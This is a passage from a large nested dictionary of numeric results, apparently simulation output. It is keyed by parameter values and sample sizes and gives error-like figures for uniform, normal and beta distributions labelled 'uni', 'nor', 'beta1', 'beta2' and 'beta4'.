0.07629409467461495, 'beta4': 0.03167459557515717}, 500: {'uni': 0.04814188204423331, 'nor': 0.08871034088415142, 'beta1': 0.04758674792285417, 'beta2': 0.08541839890028591, 'beta4': 0.03925920431586538}, 400: {'uni': 0.054007658904476896, 'nor': 0.09269490981804712, 'beta1': 0.05325465974697008, 'beta2': 0.08787830915620459, 'beta4': 0.04425711117117276}, 300: {'uni': 0.06166042307350328, 'nor': 0.09814136406424179, 'beta1': 0.06140103113984097, 'beta2': 0.0953246518668952, 
'beta4': 0.05161170153868877}, 200: {'uni': 0.07533722846773899, 'nor': 0.1076845305009698, 'beta1': 0.07475323397653444, 'beta2': 0.10614951521713306, 'beta4': 0.06424476858167916}, 150: {'uni': 0.08661147103718747, 'nor': 0.11679904366669902, 'beta1': 0.0862468564230863, 'beta2': 0.11532702446321819, 'beta4': 0.07558718090110728}, 100: {'uni': 0.1052555935603583, 'nor': 0.13183406809273956, 'beta1': 0.10578415846309697, 'beta2': 0.13050924243730755, 'beta4': 0.0937872652849821}, 75: {'uni': 0.12126435398082328, 'nor': 0.14504840369414934, 'beta1': 0.12158416691242752, 'beta2': 0.14424291715318288, 'beta4': 0.11036706757812237}, 50: {'uni': 0.14834069782758857, 'nor': 0.16807773831916928, 'beta1': 0.1488517171705721, 'beta2': 0.16739872482395307, 'beta4': 0.13691632557397643}, 30: {'uni': 0.19058841526927756, 'nor': 0.2065490922203851, 'beta1': 0.1901874541797639, 'beta2': 0.20483694072987557, 'beta4': 0.1806171436449474}, 20: {'uni': 0.23088484153300304, 'nor': 0.24560591918060148, 'beta1': 0.23134779605096323, 'beta2': 0.24365102169836095, 'beta4': 0.22264414971371438}, 10: {'uni': 0.3223581507118726, 'nor': 0.3333247832694408, 'beta1': 0.3216527474966696, 'beta2': 0.33129856873943275, 'beta4': 0.31612481972111983}}, 50: {1000: {'uni': 0.03610852487574101, 'nor': 0.0960874267256373, 'beta1': 0.033752114731624816, 'beta2': 0.0812415823085737, 'beta4': 0.0271620542706206}, 750: {'uni': 0.04093834200462532, 'nor': 0.09793556503751522, 'beta1': 0.03893376090817102, 'beta2': 0.08431844210129946, 'beta4': 0.03135962540422432}, 500: {'uni': 0.049336171986172905, 'nor': 0.10301434196794912, 'beta1': 0.04759746865566261, 'beta2': 0.09139711532965078, 'beta4': 0.03862301968563475}, 400: {'uni': 0.05463463924511991, 'nor': 0.10682402764821919, 'beta1': 0.05340709570203017, 'beta2': 0.0936397826733697, 'beta4': 0.04355260412773232}, 300: {'uni': 0.0623466502897439, 'nor': 0.11107955757096866, 'beta1': 0.06138170680347399, 'beta2': 0.10123250462805955, 'beta4': 
0.05033595962483417}, 200: {'uni': 0.07554749668228766, 'nor': 0.12086678162054343, 'beta1': 0.0750416632363875, 'beta2': 0.11066959713661007, 'beta4': 0.0628060062760799}, 150: {'uni': 0.08739996958985385, 'nor': 0.12869541233213377, 'beta1': 0.08678659184299659, 'beta2': 0.12101764597314102, 'beta4': 0.07333451117705557}, 100: {'uni': 0.1059059556833244, 'nor': 0.1439095892813752, 'beta1': 0.10502496284200347, 'beta2': 0.1363796007125728, 'beta4': 0.09183606784698817}, 75: {'uni': 0.12175423531083684, 'nor': 0.15563413203809512, 'beta1': 0.12147657892364672, 'beta2': 0.1499620639515612, 'beta4': 0.10751782011418409}, 50: {'uni': 0.14800126374665257, 'nor': 0.17897180334401325, 'beta1': 0.14816290217139777, 'beta2': 0.1722281185648024, 'beta4': 0.1346224305003566}, 30: {'uni': 0.1887615721783148, 'nor': 0.21543468889014744, 'beta1': 0.190646670636544, 'beta2': 0.20948680711825576, 'beta4': 0.176259226549204}, 20: {'uni': 0.23023189652909293, 'nor': 0.2526685251360331, 'beta1': 0.23189889525873808, 'beta2': 0.2466910520448944, 'beta4': 0.2191893725919991}, 10: {'uni': 0.32299804783142616, 'nor': 0.3385208191642214, 'beta1': 0.3240970373299222, 'beta2': 0.330246772124018, 'beta4': 0.3131856367832769}}, 30: {1000: {'uni': 0.04055798585870418, 'nor': 0.12045878407806199, 'beta1': 0.03391282668139051, 'beta2': 0.09043202391168703, 'beta4': 0.026772664648918143}, 750: {'uni': 0.04458498964957813, 'nor': 0.12145350900121721, 'beta1': 0.03914910293909302, 'beta2': 0.0935565637316701, 'beta4': 0.031080040721369384}, 500: {'uni': 0.05222341973082678, 'nor': 0.1268382821804781, 'beta1': 0.04777032892633393, 'beta2': 0.09990217329576723, 'beta4': 0.03819481473884745}, 400: {'uni': 0.056861508270290684, 'nor': 0.12942238770629788, 'beta1': 0.0532675354399576, 'beta2': 0.10316552318518735, 'beta4': 0.042868749065423484}, 300: {'uni': 0.06457084720883632, 'nor': 0.13351603952339597, 'beta1': 0.061361887130497395, 'beta2': 0.10951015522976426, 'beta4': 0.049682092131381306}, 200: 
{'uni': 0.07720678728039648, 'nor': 0.14219389731717424, 'beta1': 0.07503079131267198, 'beta2': 0.12017019496462067, 'beta4': 0.061734503814410535}, 150: {'uni': 0.08848642196594714, 'nor': 0.1500355311895341, 'beta1': 0.08631984938429821, 'beta2': 0.12838525098850095, 'beta4': 0.0718410012841619}, 100: {'uni': 0.10657957938014417, 'nor': 0.16231407544099366, 'beta1': 0.10548271930091585, 'beta2': 0.14360421901255419, 'beta4': 0.08890819357084263}, 75: {'uni': 0.12258252780364842, 'nor': 0.1746077488797695, 'beta1': 0.12168422916715942, 'beta2': 0.15632646573417341, 'beta4': 0.10426763026201397}, 50: {'uni': 0.14824751171813622, 'nor': 0.19345539799865896, 'beta1': 0.14757982972276956, 'beta2': 0.1782320565559261, 'beta4': 0.12956990555575637}, 30: {'uni': 0.19007534797164194, 'nor': 0.22980066650049646, 'beta1': 0.18953145977057473, 'beta2': 0.21398344377916256, 'beta4': 0.17247209313506517}, 20: {'uni': 0.23051753895022453, 'nor': 0.2663268342701276, 'beta1': 0.2307327055958382, 'beta2': 0.2513386326841577, 'beta4': 0.21383795792710225}, 10: {'uni': 0.32014689511568667, 'nor': 0.34697266220274, 'beta1': 0.3237670049413221, 'beta2': 0.3357362830315301, 'beta4': 0.30748660519832094}}, 20: {1000: {'uni': 0.049274913203381954, 'nor': 0.14598076136064764, 'beta1': 0.04773172248544687, 'beta2': 0.10208044800903471, 'beta4': 0.02678894215396943}, 750: {'uni': 0.051859490365182094, 'nor': 0.14739225959074442, 'beta1': 0.047875305623994, 'beta2': 0.10544771824923445, 'beta4': 0.031169107205504698}, 500: {'uni': 0.058024976856876465, 'nor': 0.15193051514519595, 'beta1': 0.04839368483595815, 'beta2': 0.10979535020355546, 'beta4': 0.038016224370682805}, 400: {'uni': 0.062200844002211486, 'nor': 0.1537517807864368, 'beta1': 0.05344573741806791, 'beta2': 0.11432086453404405, 'beta4': 0.042678379119217236}, 300: {'uni': 0.06864694129034321, 'nor': 0.1588340869015541, 'beta1': 0.061657151171832125, 'beta2': 0.11908535230283115, 'beta4': 0.049311269074143405}, 200: {'uni': 
0.08082515275880864, 'nor': 0.1653404286408089, 'beta1': 0.07528213929157085, 'beta2': 0.12905037545647996, 'beta4': 0.06078472833045673}, 150: {'uni': 0.09067340943954105, 'nor': 0.1719167421754575, 'beta1': 0.08654348956789837, 'beta2': 0.1377516058425463, 'beta4': 0.07049778930105871}, 100: {'uni': 0.1086666058987017, 'nor': 0.18582138140525045, 'beta1': 0.10555332688519786, 'beta2': 0.1520573786986546, 'beta4': 0.08771942043391467}, 75: {'uni': 0.12367516250114241, 'nor': 0.1936529244743188, 'beta1': 0.12127286264345238, 'beta2': 0.16320255408908907, 'beta4': 0.10226685365525778}, 50: {'uni': 0.14913935597178152, 'nor': 0.2158588407634494, 'beta1': 0.14842740385680675, 'beta2': 0.18610463716939651, 'beta4': 0.1264269525886395}, 30: {'uni': 0.1894435241919467, 'nor': 0.24698362415268657, 'beta1': 0.1902052475438244, 'beta2': 0.2208874403100017, 'beta4': 0.16740207123414985}, 20: {'uni': 0.23045459417674147, 'nor': 0.2799231266745311, 'beta1': 0.23095718339914606, 'beta2': 0.25625627348359864, 'beta4': 0.20847547734226834}, 10: {'uni': 0.3184035049947215, 'nor': 0.36156368323481775, 'beta1': 0.31812314781434214, 'beta2': 0.3366009664560641, 'beta4': 0.30273632497052144}}, 10: {1000: {'uni': 0.08279938794024366, 'nor': 0.20746864987159275, 'beta1': 0.08963877760273378, 'beta2': 0.13088236164799233, 'beta4': 0.02673844765905936}, 750: {'uni': 0.08426832961599184, 'nor': 0.20874280374404391, 'beta1': 0.08955811722492701, 'beta2': 0.13542495464202575, 'beta4': 0.03080220729065536}, 500: {'uni': 0.08659140770361992, 'nor': 0.21132286282870372, 'beta1': 0.08971002227585745, 'beta2': 0.137474594046657, 'beta4': 0.03774600933075223}, 400: {'uni': 0.08845482467918225, 'nor': 0.21371189689386383, 'beta1': 0.0897073855362439, 'beta2': 0.14244766972162892, 'beta4': 0.0421496940463395}, 300: {'uni': 0.09163999186977767, 'nor': 0.21681989561836174, 'beta1': 0.089886875954427, 'beta2': 0.14494850873515852, 'beta4': 0.048801996044743334}, 200: {'uni': 0.09824982646268379, 'nor': 
0.2229381862621922, 'beta1': 0.09064463588385452, 'beta2': 0.15207622316955471, 'beta4': 0.05991506202414604}, 150: {'uni': 0.10597878355719062, 'nor': 0.22906946762966052, 'beta1': 0.0914691379185335, 'beta2': 0.15947859758245603, 'beta4': 0.06920496232883624}, 100: {'uni': 0.1204073194961825, 'nor': 0.23747551585427307, 'beta1': 0.10577014356758019, 'beta2': 0.17148307936029666, 'beta4': 0.08496381763696761}, 75: {'uni': 0.1334590836264363, 'nor': 0.2501046310309356, 'beta1': 0.12291423498596181, 'beta2': 0.1820777815006388, 'beta4': 0.09937452733840269}, 50: {'uni': 0.15659478623743123, 'nor': 0.2649487192543656, 'beta1': 0.14785603195288383, 'beta2': 0.20366919537172168, 'beta4': 0.12201244106590736}, 30: {'uni': 0.19399803736356186, 'nor': 0.29471369014840654, 'beta1': 0.18900850606731456, 'beta2': 0.23377561600860308, 'beta4': 0.15979617861494677}, 20: {'uni': 0.2327209769876345, 'nor': 0.3216648320505805, 'beta1': 0.22968888409928068, 'beta2': 0.2662874109164176, 'beta4': 0.19955725481302533}, 10: {'uni': 0.3167985271399704, 'nor': 0.3980931466618715, 'beta1': 0.3167971014813921, 'beta2': 0.34276356880144665, 'beta4': 0.28980968413230446}}}, 0.25: {1000: {1000: {'uni': 0.03199275137995117, 'nor': 0.0377612558253515, 'beta1': 0.03207386640216253, 'beta2': 0.051317660480200256, 'beta4': 0.029150123111011506}, 750: {'uni': 0.036938790221011875, 'nor': 0.042241745609793546, 'beta1': 0.03708565565300198, 'beta2': 0.05311937295175995, 'beta4': 0.034313693230411}, 500: {'uni': 0.04518467957852923, 'nor': 0.04973246769105877, 'beta1': 0.045095608233479745, 'beta2': 0.0579300692476834, 'beta4': 0.04254589117113883}, 400: {'uni': 0.0502034071958003, 'nor': 0.05454115588980907, 'beta1': 0.05055080954159219, 'beta2': 0.061161550088231986, 'beta4': 0.04797066239068751}, 300: {'uni': 0.058494397771818585, 'nor': 0.062028740711859265, 'beta1': 0.05833380007137132, 'beta2': 0.06798358010263028, 'beta4': 0.05630460494121223}, 200: {'uni': 0.07096438668841598, 'nor': 
0.07412020377216044, 'beta1': 0.07133115327499512, 'beta2': 0.07896884752622757, 'beta4': 0.06907818308168096}, 150: {'uni': 0.08208505648349079, 'nor': 0.08447429233523951, 'beta1': 0.08184669107075387, 'beta2': 0.08801509549599151, 'beta4': 0.07992744012646691}, 100: {'uni': 0.10004565549548194, 'nor': 0.10237522390461173, 'beta1': 0.0999275224639195, 'beta2': 0.10532128217368142, 'beta4': 0.0988563106856703}, 75: {'uni': 0.11589185212999692, 'nor': 0.11807251171646749, 'beta1': 0.11485210164860138, 'beta2': 0.12031055325904372, 'beta4': 0.11412331652115923}, 50: {'uni': 0.14049191983680576, 'nor': 0.14195558645235828, 'beta1': 0.14048079336364855, 'beta2': 0.14452775406933738, 'beta4': 0.13989919886563593}, 30: {'uni': 0.18085720286815, 'nor': 0.18147395490124796, 'beta1': 0.1801423435578804, 'beta2': 0.1829095154193338, 'beta4': 0.17865742454053038}, 20: {'uni': 0.2188793664518785, 'nor': 0.2205153587206411, 'beta1': 0.2189194895346508, 'beta2': 0.2208849473005658, 'beta4': 0.21926359723489885}, 10: {'uni': 0.30590762068535415, 'nor': 0.3074011033419454, 'beta1': 0.3065343123341402, 'beta2': 0.3079808039413954, 'beta4': 0.3041198788346453}}, 750: {1000: {'uni': 0.032368347030127004, 'nor': 0.039495932165949266, 'beta1': 0.032127527217265195, 'beta2': 0.05096820210071745, 'beta4': 0.028616305560898614}, 750: {'uni': 0.03713885168013714, 'nor': 0.043817159608602774, 'beta1': 0.0367837672562607, 'beta2': 0.05312860283337206, 'beta4': 0.033712076422947546}, 500: {'uni': 0.04514502478230087, 'nor': 0.050939113474436026, 'beta1': 0.04537187336954829, 'beta2': 0.05849377906681347, 'beta4': 0.04188494892464878}, 400: {'uni': 0.050330802291682186, 'nor': 0.055505230954840445, 'beta1': 0.050734669077095895, 'beta2': 0.06247764901879249, 'beta4': 0.04742928078021369}, 300: {'uni': 0.05864673808177773, 'nor': 0.06291114299630962, 'beta1': 0.05852603179278021, 'beta2': 0.06804203235154582, 'beta4': 0.05550944554210635}, 200: {'uni': 0.07110774959507277, 'nor': 
0.0750417803744845, 'beta1': 0.07108558678723764, 'beta2': 0.07979409652007075, 'beta4': 0.06858026018509678}, 150: {'uni': 0.08247125828473023, 'nor': 0.08547463541022982, 'beta1': 0.08215710788274455, 'beta2': 0.08848680474820936, 'beta4': 0.0796438596153346}, 100: {'uni': 0.10109208297439909, 'nor': 0.10352781679515655, 'beta1': 0.1006336182710834, 'beta2': 0.10634244051752054, 'beta4': 0.09786482796671303}, 75: {'uni': 0.11522357484837831, 'nor': 0.11827499297282096, 'beta1': 0.1159196515430023, 'beta2': 0.12014424072164931, 'beta4': 0.11380644122735906}, 50: {'uni': 0.14060642168956575, 'nor': 0.1432810536145968, 'beta1': 0.1404685185904413, 'beta2': 0.14445981166680172, 'beta4': 0.14025485753096134}, 30: {'uni': 0.18144382340878018, 'nor': 0.18220171362137827, 'beta1': 0.18019204096546904, 'beta2': 0.18336020074753134, 'beta4': 0.17996933419550307}, 20: {'uni': 0.2198405269160041, 'nor': 0.21972983923644784, 'beta1': 0.2207144033629308, 'beta2': 0.22254113568844458, 'beta4': 0.21995845947855397}, 10: {'uni': 0.30707583033219277, 'nor': 0.30677572835070843, 'beta1': 0.307186086020681, 'beta2': 0.3087181699800424, 'beta4': 0.30403958473809867}}, 500: {1000: {'uni': 0.031998610331581856, 'nor': 0.04277431287550973, 'beta1': 0.03202380702522861, 'beta2': 0.053247212628520835, 'beta4': 0.028106826865999635}, 750: {'uni': 0.0368150729172666, 'nor': 0.046175305332631256, 'beta1': 0.036955925234784415, 'beta2': 0.055430828654678854, 'beta4': 0.033006186200381704}, 500: {'uni': 0.045327422254650696, 'nor': 0.053320028563376476, 'beta1': 0.04521124170257684, 'beta2': 0.06079825113216919, 'beta4': 0.04125585885231965}, 400: {'uni': 0.05058625293211194, 'nor': 0.05811521301238065, 'beta1': 0.05047854919479744, 'beta2': 0.0644472021193534, 'beta4': 0.04657197609011046}, 300: {'uni': 0.05837680448123017, 'nor': 0.06554961214753685, 'beta1': 0.05832160254575547, 'beta2': 0.07045708483321578, 'beta4': 0.05450035709303813}, 200: {'uni': 0.07137488269124403, 'nor': 
0.0765816734100554, 'beta1': 0.07097260906025193, 'beta2': 0.08122687128901757, 'beta4': 0.06810904430297748}, 150: {'uni': 0.08171768121444029, 'nor': 0.08706245424314168, 'beta1': 0.08224852816102035, 'beta2': 0.09206848284106278, 'beta4': 0.07864927350348105}, 100: {'uni': 0.10001354205421553, 'nor': 0.10494588642600383, 'beta1': 0.10032083676885117, 'beta2': 0.1073252427285255, 'beta4': 0.09755420704181944}, 75: {'uni': 0.11496296171371789, 'nor': 0.11892336415280835, 'beta1': 0.11573445907704838, 'beta2': 0.1221024266233946, 'beta4': 0.11312234604041477}, 50: {'uni': 0.1406991966723249, 'nor': 0.14434822688745969, 'beta1': 0.1408991819394264, 'beta2': 0.14576451960892592, 'beta4': 0.1390064572124975}, 30: {'uni': 0.18087047323939087, 'nor': 0.1829040634798727, 'beta1': 0.18054920049463752, 'beta2': 0.18399230494708463, 'beta4': 0.17823513722522538}, 20: {'uni': 0.21939938602159992, 'nor': 0.22182287755317703, 'beta1': 0.22045130781379252, 'beta2': 0.22290813512523416, 'beta4': 0.21814484703021253}, 10: {'uni': 0.3060836645742364, 'nor': 0.3091515297248897, 'beta1': 0.3066663173709814, 'beta2': 0.3075083864383387, 'beta4': 0.30422501574238897}}, 400: {1000: {'uni': 0.032005088669465276, 'nor': 0.04456557950368989, 'beta1': 0.03207047760229875, 'beta2': 0.05335428637134554, 'beta4': 0.02764205849240342}, 750: {'uni': 0.03707438658946127, 'nor': 0.048852635452191456, 'beta1': 0.037059120244776866, 'beta2': 0.05545369912568332, 'beta4': 0.03250465520660134}, 500: {'uni': 0.04527161577889338, 'nor': 0.05510988745673151, 'beta1': 0.0454293101810781, 'beta2': 0.061105496120222313, 'beta4': 0.04074431956109695}, 400: {'uni': 0.05033443638682883, 'nor': 0.059551554506442894, 'beta1': 0.050241105416355736, 'beta2': 0.06506528423110045, 'beta4': 0.045759081418304426}, 300: {'uni': 0.058211459729823334, 'nor': 0.06646450082163013, 'beta1': 0.05824726492475796, 'beta2': 0.07136706424691125, 'beta4': 0.05371853302556494}, 200: {'uni': 0.07136004884006591, 'nor': 
0.07847889640933037, 'beta1': 0.07119158271516751, 'beta2': 0.0828087241613199, 'beta4': 0.066989888959891}, 150: {'uni': 0.08226981215061391, 'nor': 0.08787491015723636, 'beta1': 0.0820213556261612, 'beta2': 0.0922395433103187, 'beta4': 0.0782455680987506}, 100: {'uni': 0.0999425967371041, 'nor': 0.1055486790460004, 'beta1': 0.09960125420912624, 'beta2': 0.1088178339306568, 'beta4': 0.09699734407107313}, 75: {'uni': 0.11616131437111837, 'nor': 0.11979183643647795, 'beta1': 0.11556364812719394, 'beta2': 0.12237760407249698, 'beta4': 0.1124749001044939}, 50: {'uni': 0.14107921330185552, 'nor': 0.14436563346328762, 'beta1': 0.14060580635640263, 'beta2': 0.14613157564214374, 'beta4': 0.13891710396762352}, 30: {'uni': 0.18030508328138095, 'nor': 0.18482261222058646, 'beta1': 0.18024669252888958, 'beta2': 0.18503042752212556, 'beta4': 0.17833798147699706}, 20: {'uni': 0.21972895156921568, 'nor': 0.22310165064904985, 'beta1': 0.21906869562507247, 'beta2': 0.2237444999736099, 'beta4': 0.21783462233689643}, 10: {'uni': 0.3045782011808965, 'nor': 0.30585595084735995, 'beta1': 0.3062967507461382, 'beta2': 0.30905483197965655, 'beta4': 0.3053249816659628}}, 300: {1000: {'uni': 0.032239084457734934, 'nor': 0.04761428127094802, 'beta1': 0.032038173010609405, 'beta2': 0.05574065007123413, 'beta4': 0.027269701240414}, 750: {'uni': 0.037163331746985356, 'nor': 0.05159782362000957, 'beta1': 0.03687151259245286, 'beta2': 0.057493247342013665, 'beta4': 0.032126332878003705}, 500: {'uni': 0.04518027895134363, 'nor': 0.05830373631162644, 'beta1': 0.045342369983153, 'beta2': 0.06302093871729986, 'beta4': 0.03992543574842056}, 400: {'uni': 0.05041660540845222, 'nor': 0.06273062597571621, 'beta1': 0.050506925792484725, 'beta2': 0.06679374494442292, 'beta4': 0.0453809683918249}, 300: {'uni': 0.05819791840262872, 'nor': 0.06889853173644056, 'beta1': 0.05881589576054247, 'beta2': 0.07548404171599854, 'beta4': 0.05330460648413682}, 200: {'uni': 0.07099409803866191, 'nor': 0.08015771733382343, 
'beta1': 0.07149914372253519, 'beta2': 0.08491818197910528, 'beta4': 0.0660207111886566}, 150: {'uni': 0.08165348909753622, 'nor': 0.09041841839558967, 'beta1': 0.08186412904658036, 'beta2': 0.09446598626929148, 'beta4': 0.07704328735244007}, 100: {'uni': 0.10032050128616843, 'nor': 0.10736683019992799, 'beta1': 0.10052095271344208, 'beta2': 0.11016773078480463, 'beta4': 0.09642704867227114}, 75: {'uni': 0.11561316546647915, 'nor': 0.12094802011662908, 'beta1': 0.11523834024523168, 'beta2': 0.12439262057779943, 'beta4': 0.11152777353064466}, 50: {'uni': 0.14018486722638512, 'nor': 0.14571982545039386, 'beta1': 0.14112158063583297, 'beta2': 0.1477125646402092, 'beta4': 0.13703508806923154}, 30: {'uni': 0.18072304976823583, 'nor': 0.1846706102625543, 'beta1': 0.18032073445217073, 'beta2': 0.18543660392632166, 'beta4': 0.1774188167718942}, 20: {'uni': 0.22002473058377936, 'nor': 0.22233988983477326, 'beta1': 0.219611410295673, 'beta2': 0.2238362766248162, 'beta4': 0.21760444529561554}, 10: {'uni': 0.30592439821930945, 'nor': 0.3083597959740417, 'beta1': 0.3068948351628876, 'beta2': 0.3076071685456584, 'beta4': 0.3053936839900976}}, 200: {1000: {'uni': 0.032145127804773244, 'nor': 0.05349333747510293, 'beta1': 0.0319567056231127, 'beta2': 0.05863229193574737, 'beta4': 0.02689596641142078}, 750: {'uni': 0.03706566197402705, 'nor': 0.05686923973969488, 'beta1': 0.03685443931928145, 'beta2': 0.061233105783269015, 'beta4': 0.03135246921457169}, 500: {'uni': 0.045287310383440804, 'nor': 0.06333268823272437, 'beta1': 0.04543966891783402, 'beta2': 0.06633448987394563, 'beta4': 0.039157769206374704}, 400: {'uni': 0.05058001358487568, 'nor': 0.06756534858480051, 'beta1': 0.05056634568175178, 'beta2': 0.07314321695984138, 'beta4': 0.04408417011680896}, 300: {'uni': 0.0584055924161348, 'nor': 0.07369190108393786, 'beta1': 0.05857816948096051, 'beta2': 0.07848195518441148, 'beta4': 0.05169771628815578}, 200: {'uni': 0.07130150466307517, 'nor': 0.08467495205397024, 'beta1': 
0.07127183814358251, 'beta2': 0.0881972753860466, 'beta4': 0.06459411653988484}, 150: {'uni': 0.08230542143096298, 'nor': 0.09388689821838958, 'beta1': 0.0823575524673264, 'beta2': 0.09843414713564969, 'beta4': 0.07600083070681307}, 100: {'uni': 0.09992259917931273, 'nor': 0.11061606520328848, 'beta1': 0.10091421972922207, 'beta2': 0.11274797159715078, 'beta4': 0.09405990854917767}, 75: {'uni': 0.1146453681089189, 'nor': 0.1243577334515438, 'beta1': 0.11572896766854551, 'beta2': 0.126786382446473, 'beta4': 0.10989836905325345}, 50: {'uni': 0.1408283945272606, 'nor': 0.14854443655662386, 'beta1': 0.14077373626256007, 'beta2': 0.15015510894940037, 'beta4': 0.1362970789621657}, 30: {'uni': 0.18065144082287762, 'nor': 0.18602556667128156, 'beta1': 0.18024583757633306, 'beta2': 0.187119560361907, 'beta4': 0.1768157942624079}, 20: {'uni': 0.21915855466007622, 'nor': 0.2250505751776598, 'beta1': 0.21842255121376986, 'beta2': 0.2247693098465804, 'beta4': 0.21625303838766974}, 10: {'uni': 0.3069805298827638, 'nor': 0.3088397242466276, 'beta1': 0.3053746544466997, 'beta2': 0.3098571203920325, 'beta4': 0.30339983933013226}}, 150: {1000: {'uni': 0.03222316489755345, 'nor': 0.05945194607376453, 'beta1': 0.03207935408945817, 'beta2': 0.06079634191773392, 'beta4': 0.026527269808695464}, 750: {'uni': 0.0370321650244374, 'nor': 0.0617883925674626, 'beta1': 0.03711700730448053, 'beta2': 0.06372190827907176, 'beta4': 0.03096740102793627}, 500: {'uni': 0.04532144365663909, 'nor': 0.0680586194258842, 'beta1': 0.04536848896627477, 'beta2': 0.07251693015188532, 'beta4': 0.03866327712014228}, 400: {'uni': 0.0505977822228203, 'nor': 0.07203749527198017, 'beta1': 0.050685474943401365, 'beta2': 0.07485785669758882, 'beta4': 0.04352869184910363}, 300: {'uni': 0.057965032685755036, 'nor': 0.07790764637502356, 'beta1': 0.058658948406533795, 'beta2': 0.08098586671063707, 'beta4': 0.050983529052287424}, 200: {'uni': 0.0710371027428352, 'nor': 0.08820871252384349, 'beta1': 0.07148282244840176, 
'beta2': 0.0914952470037026, 'beta4': 0.06346089963043011}, 150: {'uni': 0.08207640995751564, 'nor': 0.09766509211855923, 'beta1': 0.08167656775849508, 'beta2': 0.10012999401461498, 'beta4': 0.07427821448227956}, 100: {'uni': 0.09994734914200143, 'nor': 0.1129459883944704, 'beta1': 0.09980539436202157, 'beta2': 0.11592632608795883, 'beta4': 0.09304062628193266}, 75: {'uni': 0.11553236151223506, 'nor': 0.1273360867115455, 'beta1': 0.11561304775458114, 'beta2': 0.12896122578621239, 'beta4': 0.10856651888369684}, 50: {'uni': 0.1401267895773386, 'nor': 0.150874223818793, 'beta1': 0.14106509605862422, 'beta2': 0.15309480271707476, 'beta4': 0.13434799522511576}, 30: {'uni': 0.18100210887716317, 'nor': 0.18846250113659102, 'beta1': 0.18108600475737724, 'beta2': 0.18820408383757903, 'beta4': 0.1744893497548229}, 20: {'uni': 0.22007531711429196, 'nor': 0.22624986333580377, 'beta1': 0.22105754134774402, 'beta2': 0.2254264398404922, 'beta4': 0.21671616234795646}, 10: {'uni': 0.30579411743746077, 'nor': 0.31037044747734677, 'beta1': 0.30727843528835264, 'beta2': 0.3098797929188794, 'beta4': 0.30316988477280543}}, 100: {1000: {'uni': 0.03274216345456671, 'nor': 0.06775327941395048, 'beta1': 0.032061342840036255, 'beta2': 0.06382316122578824, 'beta4': 0.026316312803939867}, 750: {'uni': 0.037579409945831976, 'nor': 0.07067264993908817, 'beta1': 0.036944834310432384, 'beta2': 0.06667491200402953, 'beta4': 0.03049780432266838}, 500: {'uni': 0.045626044711458535, 'nor': 0.07640799770080187, 'beta1': 0.045208821668136, 'beta2': 0.07491373191518652, 'beta4': 0.03785430223359623}, 400: {'uni': 0.05090625729095505, 'nor': 0.07934795957920815, 'beta1': 0.05066551543139719, 'beta2': 0.07868508780911171, 'beta4': 0.04264742804290289}, 300: {'uni': 0.05839819477500041, 'nor': 0.08457660157789437, 'beta1': 0.05827469063418195, 'beta2': 0.0836305486592761, 'beta4': 0.05014012449638705}, 200: {'uni': 0.07131120343453617, 'nor': 0.09564864803002038, 'beta1': 0.07121453603448036, 'beta2': 
0.09501904926088, 'beta4': 0.06199710926061397}, 150: {'uni': 0.0824632894282834, 'nor': 0.10351775253135054, 'beta1': 0.08222593298518815, 'beta2': 0.10403737737010954, 'beta4': 0.07317445595779534}, 100: {'uni': 0.10027559659721097, 'nor': 0.11911693503739967, 'beta1': 0.10035631836386402, 'beta2': 0.11905850690926911, 'beta4': 0.09115925777533135}, 75: {'uni': 0.11533926378096324, 'nor': 0.13293086862293707, 'beta1': 0.11550021587841142, 'beta2': 0.13242283015048073, 'beta4': 0.10583595257901535}, 50: {'uni': 0.14125461490836977, 'nor': 0.15481343079067678, 'beta1': 0.14083804530729904, 'beta2': 0.15486187856446598, 'beta4': 0.13213869045119073}, 30: {'uni': 0.18067693462898593, 'nor': 0.19209904272032094, 'beta1': 0.18048591905655675, 'beta2': 0.19132292898534176, 'beta4': 0.1731204060059379}, 20: {'uni': 0.2194497761344132, 'nor': 0.22952776186358645, 'beta1': 0.2210084936336856, 'beta2': 0.2277523801643781, 'beta4': 0.21401777417550116}, 10: {'uni': 0.30491836630916047, 'nor': 0.3136863210929642, 'beta1': 0.3059618384293903, 'beta2': 0.31145305621358244, 'beta4': 0.30218740315401166}}, 75: {1000: {'uni': 0.03296804299574074, 'nor': 0.07502584510325999, 'beta1': 0.03198909471182765, 'beta2': 0.06627849631603855, 'beta4': 0.026018303221585604}, 750: {'uni': 0.03781889522611104, 'nor': 0.07750171416392093, 'beta1': 0.03709295438746274, 'beta2': 0.06966374591084012, 'beta4': 0.030083456649105722}, 500: {'uni': 0.04588611395620795, 'nor': 0.0832308871539903, 'beta1': 0.04503188517914297, 'beta2': 0.0778680999061172, 'beta4': 0.037422494765473796}, 400: {'uni': 0.05103896713119821, 'nor': 0.08624943932637474, 'beta1': 0.050515142768203625, 'beta2': 0.08092558102345371, 'beta4': 0.04214991872531762}, 300: {'uni': 0.058619489540432834, 'nor': 0.09218377722158483, 'beta1': 0.05833566460055162, 'beta2': 0.08767072534918796, 'beta4': 0.04948056049731009}, 200: {'uni': 0.07142937649921666, 'nor': 0.10153881530955883, 'beta1': 0.0711962247024438, 'beta2': 
0.09878624986895768, 'beta4': 0.06114388931769735}, 150: {'uni': 0.0818160837503934, 'nor': 0.10962021535420124, 'beta1': 0.0821248472699912, 'beta2': 0.10678592690352856, 'beta4': 0.07201635109029625}, 100: {'uni': 0.10033935923350429, 'nor': 0.12400158701587738, 'beta1': 0.10019144115697398, 'beta2': 0.12257338875860513, 'beta4': 0.08958751642761531}, 75: {'uni': 0.11463620909947292, 'nor': 0.13729280250456427, 'beta1': 0.11545358481112064, 'beta2': 0.13533805566311075, 'beta4': 0.10463860294573568}, 50: {'uni': 0.14041083829724632, 'nor': 0.1601934699301324, 'beta1': 0.14118094481810134, 'beta2': 0.15649100485487455, 'beta4': 0.13079204536225447}, 30: {'uni': 0.17941841118483848, 'nor': 0.19432333539672053, 'beta1': 0.18108637707222786, 'beta2': 0.1940514148883128, 'beta4': 0.17116345309006809}, 20: {'uni': 0.2191045954547003, 'nor': 0.23156916864980065, 'beta1': 0.21958539239874875, 'beta2': 0.2288693020710007, 'beta4': 0.2111983732891391}, 10: {'uni': 0.3076647019304655, 'nor': 0.3173691048923303, 'beta1': 0.30576781526816577, 'beta2': 0.3130098845736485, 'beta4': 0.2972158297961716}}, 50: {1000: {'uni': 0.03433430022899808, 'nor': 0.08842102532667545, 'beta1': 0.03223331907376098, 'beta2': 0.07277518065743305, 'beta4': 0.02588821628662097}, 750: {'uni': 0.03887126446259914, 'nor': 0.0910846873593219, 'beta1': 0.036951578170920873, 'beta2': 